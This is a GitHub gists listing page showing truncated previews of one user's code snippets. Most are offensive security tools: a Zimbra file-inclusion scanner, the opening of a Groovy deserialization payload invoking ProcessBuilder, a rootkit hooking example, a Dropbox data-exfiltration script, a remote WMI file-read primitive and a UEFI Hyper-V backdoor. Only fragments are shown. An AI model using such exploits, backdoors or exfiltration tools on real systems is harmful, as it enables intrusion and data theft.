JohnTroony
/ http-vuln-zimbra-lfi.nse
Created
August 30, 2018 08:40
— forked from iagox86/http-vuln-zimbra-lfi.nse
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local http = require "http" | |
| local shortport = require "shortport" | |
| local stdnse = require "stdnse" | |
| local string = require "string" | |
| local vulns = require "vulns" | |
| description = [[ | |
| A 0 day was been released on the 6th december 2013 by rubina119, and was patched in Zimbra 7.2.6. | |
| The vulnerability is a local file inclusion that can retrieve any file from the server. |
JohnTroony
/ escapetest.c
Created
August 25, 2018 18:42
— forked from Zenexer/escapetest.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile with -std=c11 | |
| #include <stdlib.h> | |
| #include <stdarg.h> | |
| #include <stdio.h> | |
| #include <inttypes.h> | |
| #include <string.h> | |
| #include <limits.h> | |
| #define MAX_STR_LEN 4095 |
JohnTroony
/ kryo-1.xml
Created
August 20, 2018 06:16
— forked from anonymous/kryo-1.xml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <map> | |
| <entry> | |
| <groovy.util.Expando> | |
| <expandoProperties> | |
| <entry> | |
| <string>hashCode</string> | |
| <org.codehaus.groovy.runtime.MethodClosure> | |
| <delegate class="groovy.util.Expando" reference="../../../.."/> | |
| <owner class="java.lang.ProcessBuilder"> | |
| <command> |
JohnTroony
/ main.yaml
Created
April 15, 2018 18:32
— forked from kbariotis/main.yaml
Ansible playbook for deploying a Node.js app to DigitalOcean
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - name: DO | |
| hosts: localhost | |
| vars: | |
| project_name: "PUT A NAME FOR YOUR PROJECT HERE" | |
| do_token: "PUT YOUR DIGITAL OCEAN API KEY HERE ==> https://cloud.digitalocean.com/settings/api/tokens" | |
| repository: "PUT YOUR REPOSITORY URL HERE" | |
| tasks: | |
| - name: LOCAL | Generate SSH key | |
| shell: ssh-keygen -b 2048 -t rsa -f ~/.ssh/{{project_name}} -q -N "" |
JohnTroony
/ listkmods.py
Created
January 12, 2018 07:43
— forked from patois/listkmods.py
ida/vmware kernel debugging helper
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from idaapi import * | |
| # with code taken from http://hexblog.com/idapro/vmware_modules.py | |
| class LoadedModulesList(Choose2): | |
| def __init__(self, title, flags=0, width=None, height=None, embedded=False, modal=False): | |
| self.ptr = get_name_ea_simple("PsLoadedModuleList") | |
| if self.ptr == BADADDR: | |
| raise ValueError('Missing symbol: PsLoadedModuleList') |
JohnTroony
/ Injectable.cpp
Created
December 18, 2017 19:10
— forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
JohnTroony
/ kvm_main.c
Created
November 2, 2017 14:20
— forked from Pacifist117/kvm_main.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Kernel-based Virtual Machine driver for Linux | |
| * | |
| * This module enables machines with Intel VT-x extensions to run virtual | |
| * machines without emulation or binary translation. | |
| * | |
| * Copyright (C) 2006 Qumranet, Inc. | |
| * Copyright 2010 Red Hat, Inc. and/or its affiliates. | |
| * | |
| * Authors: |
JohnTroony
/ DropBoxLoot.py
Created
October 3, 2017 17:58
Python Script Post Exploitation Activities (Data Exfiltration where network bandwidth is limited but Dropbox is allowed).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| """ | |
| @author: John Ombagi | |
| """ | |
| import os | |
| import sys | |
| import base64 | |
| import dropbox | |
| import time |
JohnTroony
/ FileReadPrimitive.ps1
Created
August 21, 2017 09:00
— forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $CimSession = New-CimSession -ComputerName 10.0.0.2 | |
| $FilePath = 'C:\Windows\System32\notepad.exe' | |
| # PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation. | |
| $PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession | |
| $InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly | |
| $FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession | |
| $FileLengthBytes = $FileContents.FileData[0..3] | |
| [Array]::Reverse($FileLengthBytes) |
JohnTroony
/ DmaHvBackdoor.c
Created
August 18, 2017 10:06
— forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ********************************************************************* | |
| Part of UEFI DXE driver code that injects Hyper-V VM exit handler | |
| backdoor into the Device Guard enabled Windows 10 Enterprise. | |
| Execution starts from new_ExitBootServices() -- a hook handler | |
| for EFI_BOOT_SERVICES.ExitBootServices() which being called by | |
| winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi | |
| transfers exeution to previously loaded Hyper-V kernel (hvix64.sys) |